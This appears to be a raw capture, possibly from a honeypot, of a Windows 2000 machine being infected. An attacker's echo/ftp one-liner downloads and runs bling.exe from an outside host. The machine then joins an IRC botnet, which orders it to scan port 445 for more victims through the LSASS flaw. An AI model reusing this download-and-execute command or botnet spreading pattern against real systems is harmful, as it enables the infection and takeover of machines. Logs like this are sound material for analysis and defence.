Server: echo open 77.241.140.108 26826 > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
ATTACKER:	echo open 77.241.140.108 26826 > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe 
ATTACKER:	220 StnyFtpd 0wns j0 
VICTIM:  	USER 1 
ATTACKER:	331 Password required 
VICTIM:  	PASS 1 
ATTACKER:	230 User logged in. 
VICTIM:  	PORT 192,168,1,37,4, 
ATTACKER:	200 PORT command successful. 
ATTACKER:	RETR bling.exe 
ATTACKER:	150 Opening BINARY mode data connection 
ATTACKER:	226 Transfer complete. 
ATTACKER:	226 Transfer complete. 
VICTIM:  	QUIT 
ATTACKER:	221 Goodbye happy r00ting. 
VICTIM:  	NICK [r00x-eXe]-321720USER citzzr 0 0 :[r00x-eXe]-321720 
ATTACKER:	:execro.no-ip.org NOTICE AUTH :*** Looking up your hostname... 
ATTACKER:	:execro.no-ip.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead 
ATTACKER:	PING :C8EC0D 
ATTACKER:	PONG :C8EC0D 
ATTACKER:	:execro.no-ip.org 001 [r00x-eXe]-321720 :Welcome to the eXe IRC Network [r00x-eXe]-321720!citzzr@192.168.1.37:execro.no-ip.org 002 [r00x-eXe]-321720 :Your host is execro.no-ip.org, running version Unreal3.2.7:execro.no-ip.org 003 [r00x-eXe]-321720 :This server was created Fri Jul 13 19:22:25 2007:execro.no-ip.org 004 [r00x-eXe]-321720 execro.no-ip.org Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj:execro.no-ip.org 005 [r00x-eXe]-321720 NAMESX SAFELIST HCN MAXCHANNELS=100 CHANLIMIT=#:100 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server:execro.no-ip.org 005 [r00x-eXe]-321720 WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=eXe CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server:execro.no-ip.org 005 [r00x-eXe]-321720 CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server 
VICTIM:  	JOIN #xx vegas 
ATTACKER:	:execro.no-ip.org 251 [r00x-eXe]-321720 :There are 1 users and 6 invisible on 1 servers:execro.no-ip.org 254 [r00x-eXe]-321720 2 :channels formed:execro.no-ip.org 255 [r00x-eXe]-321720 :I have 7 clients and 0 servers:execro.no-ip.org 265 [r00x-eXe]-321720 :Current Local Users: 7  Max: 40:execro.no-ip.org 266 [r00x-eXe]-321720 :Current Global Users: 7  Max: 23:execro.no-ip.org 422 [r00x-eXe]-321720 :MOTD File is missing:[r00x-eXe]-321720 MODE [r00x-eXe]-321720 :+iwx 
VICTIM:  	USERHOST [r00x-eXe]-321720MODE [r00x-eXe]-321720 -xJOIN #xx vegasUSERHOST [r00x-eXe]-321720MODE [r00x-eXe]-321720 -xJOIN #xx vegasUSERHOST [r00x-eXe]-321720MODE [r00x-eXe]-321720 -xJOIN #xx vegasUSERHOST [r00x-eXe]-321720MODE [r00x-eXe]-321720 -xJOIN #xx vegas 
ATTACKER:	:[r00x-eXe]-321720!citzzr@DE327DAB.AB8D5A4A.1F3B9FD7.IP JOIN :#xx:execro.no-ip.org 332 [r00x-eXe]-321720 #xx :!advscan lsass_445 100 10 0 x.x.x.x:execro.no-ip.org 333 [r00x-eXe]-321720 #xx eXe 1194516415:execro.no-ip.org 353 [r00x-eXe]-321720 = #xx :[r00x-eXe]-321720 [r00x-eXe]-364043 [r00x-eXe]-927706 [r00x-eXe]-882209 [r00x-eXe]-413853 :execro.no-ip.org 366 [r00x-eXe]-321720 #xx :End of /NAMES list. 
VICTIM:  	PRIVMSG #xx :[SCAN]: Random Scan Started : x.x.x.x:445  delay  10 secs  0 using 100 threads. 
ATTACKER:	:execro.no-ip.org 302 [r00x-eXe]-321720 :[r00x-eXe]-321720=+citzzr@192.168.1.37    :[r00x-eXe]-321720 MODE [r00x-eXe]-321720 :-x:execro.no-ip.org 302 [r00x-eXe]-321720 :[r00x-eXe]-321720=+citzzr@192.168.1.37    :execro.no-ip.org 302 [r00x-eXe]-321720 :[r00x-eXe]-321720=+citzzr@192.168.1.37